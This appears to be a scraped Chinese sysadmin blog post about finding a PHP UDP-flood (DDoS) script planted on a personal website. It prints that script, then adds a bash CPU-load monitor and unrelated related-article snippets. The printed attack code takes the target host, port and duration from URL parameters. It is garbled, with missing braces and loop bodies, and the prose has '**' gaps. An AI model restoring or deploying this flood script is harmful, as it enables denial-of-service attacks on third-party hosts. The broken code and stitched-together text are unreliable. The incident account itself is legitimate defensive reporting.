於時立即把iftop裝上,通過iptop檢視,其中有個ip顯示流量超高,達到每秒7、8m,就是它了,它這個ip抓出來,到cookie log去grep一下,終於找到了這個ip訪問的頁面,一看是乙個陌生的頁面,裡面放的就是php-ddos的攻擊**:
<?php
set_time_limit(999999);
$host = $_get['host'];
$port = $_get['port'];
$exec_time = $_get['time'];
$sendlen = 65535;
$packets = 0;
ignore_user_abort(true);
if (strlen($host)==0 or strlen($port)==0 or strlen($exec_time)==0)
echo "warning to: opening";
exit;
}for($i=0;$i<$sendlen;$i++)
$max_time = time()+$exec_time;
while(1)
$fp = fsockopen("udp://$host", $port, $errno, $errstr, 5);
if($fp)
}echo "send host:$host:$port
";echo "send flow:$packets * ($sendlen/1024=" . round($sendlen/1024, 2) . ")kb / 1024 = " . round($packets*$sendlen/1024/1024, 2) . " mb
";echo "send rate:" . round($packets/$exec_time, 2) . " packs/s;" . round($packets/$exec_time*$sendlen/1024/1024, 2) . " mb/s";
?>
平時太大意了,以為是個人**就沒有太多的花時間在上面,檢視檔案建立時間,居然是去年11月份,也就是說這個檔案已經存在了半年了,難怪當時連換幾家伺服器服務商都是用不了多久就訪問變慢了,當時心理面還在埋怨這些服務商,哎,當時怎麼就沒有細查呢。
後面準備先採用簡單的處理方式,對cpu的load進行監控,實現原理就是寫乙個shell,定時的去抓load情況,然後**目錄下面的乙個檔案中,以便於隨便可以檢視,這樣在出現問題的時候,能夠比較早的知道。指令碼很簡單,就做了兩件事情,獲取load以及在load超標的時候,重啟apache,也放在這裡吧:
#!/bin/bash
currentdate=`date`
cpuload=`w|grep load|awk -f"," ''|awk -f": " ''`;
#if [ "$cpuload" -gt "3" ]; then
echo "$currentdate, current load is :$cpuload
" >> /webdir/load.txt;
if [ `echo "$cpuload > 3" | bc` -eq 1 ]; then
echo "cpuload is great than 3, then restart apache" >> /webdir/load.txt;
/opt/lampp/lampp restartapache;
fi
伺服器處理挖礦
使用top查詢程序 某個程序占用cpu或記憶體過分,查之 如 進入目錄,分析裡面的檔案,進入 etc下,分析如update類似的檔案。處理過程 chattr i 檔案 rm rf 檔案 如果是root使用者感染的病毒 vim etc selinux config 將selinux disabled改...
利用批處理檢查伺服器宕機,批處理檢查伺服器端口
利用批處理檢查伺服器宕機,批處理檢查伺服器端口 2010年07月06日 最近有乙個小的要求需要用到批處理,我也不懂批處理,沒辦法只好現學現用。由於我們單位的伺服器有時會由於某種不明原因宕掉,目前宕了一次,雖然不是什麼大問題,因為是集群宕掉一台不影響正常訪問,但是上面對我們的考核就要大打拆扣了,因為管...
伺服器併發處理架構
網路伺服器如何處理併發請求的模型稱之為多工體系結構。1.inetd模式 在大部分unix作業系統中,預設的多工體系結構是inetd應用程式。通用的網路伺服器體系結構inetd分為兩個部分 主服務程序和客戶服務程序。主服務程序通常用於等待客戶端的連線請求。一旦客戶端發起乙個請求,主伺服器將建立連線,同...